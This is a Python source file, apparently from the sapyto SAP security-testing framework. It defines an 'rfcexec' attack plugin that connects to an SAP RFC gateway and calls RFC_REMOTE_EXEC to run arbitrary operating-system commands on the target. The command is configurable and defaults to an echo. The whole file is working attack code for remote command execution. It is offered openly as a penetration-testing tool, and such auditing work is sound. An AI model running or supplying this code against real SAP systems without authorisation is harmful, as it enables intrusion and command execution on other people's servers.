# -*- coding: latin-1 -*-
'''
rfcexec.py

Copyright 2007 Mariano Nuez Di Croce @ CYBSEC

This file is part of sapyto, http://www.cybsec.com/EN/research/tools/sapyto.php

sapyto is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.

sapyto is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with sapyto; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
'''
import core.sapytoCore as core
from core.basePlugins.basePlugin import basePlugin
import core.kb.knowledgeBase as kb
import core.output.outputManager as om
import saprfcutil
import plugins.audit.checkRfcexec as audit
from saprfc import *
from core.misc import *
import re
import copy

class rfcexec(basePlugin):
	'''
	Executes remote operating system commands if rfcexec is enabled.
	
	@author: Mariano Nuez Di Croce <mnunez@cybsec.com>
	'''
	
	def __init__(self):
		basePlugin.__init__( self )
		self._iface = None
		self._targets = {'RFCSYSID':['^\w{3}$']}
		self._gwhost = 'Current target'
		self._gwserv = 'sapgw00'		
		self._tpname = 'rfcexec'
		self._cmd = 'cmd.exe /c echo sapyto is here'
		self._checkFirst = 1
		
	def run( self ):
		om.out.information('Starting \'rfcexec\' attack plugin.')
		om.out.information('Checking Target Information: ', newLine=False)
		if core.sCore.validateTargets(self._targets):
			om.out.information('OK')
		else:
			om.out.information('Not in plugin \'targets\' list. Plugin may fail.')
		
		# TODO: If UNIX, RFC_REMOTE_PIPE could be used instead to get command output.
		self._iface = iface('RFC_REMOTE_EXEC')				
		ep_cmd = parm( 'COMMAND', '', RFCEXPORT, RFCTYPE_CHAR, len(self._cmd), 0, self._cmd)
		self._iface.addParm(ep_cmd)
		
		if self._gwhost == 'Current target':
			sysid = kb.kb.getData('sapinfo','systeminfo')['RFCSYSID']
			if re.compile('\(extern\)').match(sysid):
				# If we are analyzing a registered server, we verify its gateway!
				gw = self._conn.gwhost
			else:
				gw = self._conn.ashost
		else:
			gw = self._gwhost
		
		self._conn = conn(gwhost = gw, gwserv= self._gwserv, type = 'E', tpname = self._tpname)
		
		# Use audit plugin checkRfcexec
		if self._checkFirst == 1:
			if not kb.kb.getData( 'checkRfcexec', 'called'):
				au = audit.checkRfcexec()
				au.setConn(copy.deepcopy(self._conn))
				# Set Options for checkRfcexec
				# Ugly!
				au.setGwhost(gw)
				au.setGwserv(self._gwserv)
				au.run()
			# Get the first (probably the only) tpname
			res = kb.kb.getData( 'checkRfcexec', 'tpname')
			if res:
				self._conn = conn(gwhost = gw, gwserv= self._gwserv, type = 'E', tpname = res[0])
		
		om.out.information('\tTrying to connect...')
		try:
			self._checkConnection()
		except sapytoException:
			om.out.information('\tCould not connect with ' + self._conn.tpname)
		try:
			if not saprfcutil.call_receive( self._conn, self._iface ):
				raise sapytoException('Could not perform RFC call.')
			om.out.information('\tCommand \'' + self._cmd + '\' was sent successfully.')
			self._conn.close()
		except TypeError, e:
			self._conn.close()
			if re.compile('Command not allowed').search(str(e)):
				om.out.information('\trfcexec.sec seems to be in place, and rejecting command \'' + self._cmd + '\'.')
			elif re.compile('NO AUTORITY FOR THIS CONNECTION').search(str(e)):
				om.out.information('\trfcexec.sec seems to be in place, and rejecting our calls.')
		om.out.information('Plugin \'rfcexec\' finished.')

	def getOptionsXML(self):
		'''
		This method returns a XML containing the Options that the plugin has.
		Using this XML the framework will build a window, a menu, or some other input method to retrieve
		the info from the user. The XML has to validate against the xml schema file located at :
		sapyto/core/ui/userInterface.dtd
		
		@return: XML with the plugin options.
		'''	
		return	'<?xml version="1.0" encoding="ISO-8859-1"?>\
		<OptionList>\
			<Option name="gwhost">\
				<default>Current target</default>\
				<desc>Gateway host.</desc>\
				<type>String</type>\
			</Option>\
			<Option name="gwserv">\
				<default>sapgw00</default>\
				<desc>Gateway service</desc>\
				<type>String</type>\
			</Option>\
			<Option name="tpname">\
				<default>rfcexec</default>\
				<desc>TPname of Rfcexec server.</desc>\
				<type>String</type>\
			</Option>\
			<Option name="command">\
				<default>cmd.exe /c echo sapyto is here</default>\
				<desc>Command to run.</desc>\
				<type>String</type>\
			</Option>\
			<Option name="checkFirst">\
				<default>1</default>\
				<desc>Checks availability of Rfcexec.</desc>\
				<type>Integer</type>\
			</Option>\
		</OptionList>\
		'

	def setOptions( self, OptionList ):
		'''
		This method sets all the options that are configured using the user interface 
		generated by the framework using the result of getOptionsXML().
		
		@parameter OptionList: A dictionary with the options for the plugin.
		@return: No value is returned.
		'''	
		if 'gwhost' in OptionList.keys(): 
			self._gwhost = OptionList['gwhost']
		if 'gwserv' in OptionList.keys(): 
			self._gwserv = OptionList['gwserv']
		if 'tpname' in OptionList.keys(): 
			self._tpname = OptionList['tpname']
		if 'command' in OptionList.keys(): 
			self._cmd = OptionList['command']
		if 'checkFirst' in OptionList.keys(): 
			self._checkFirst = OptionList['checkFirst']
		
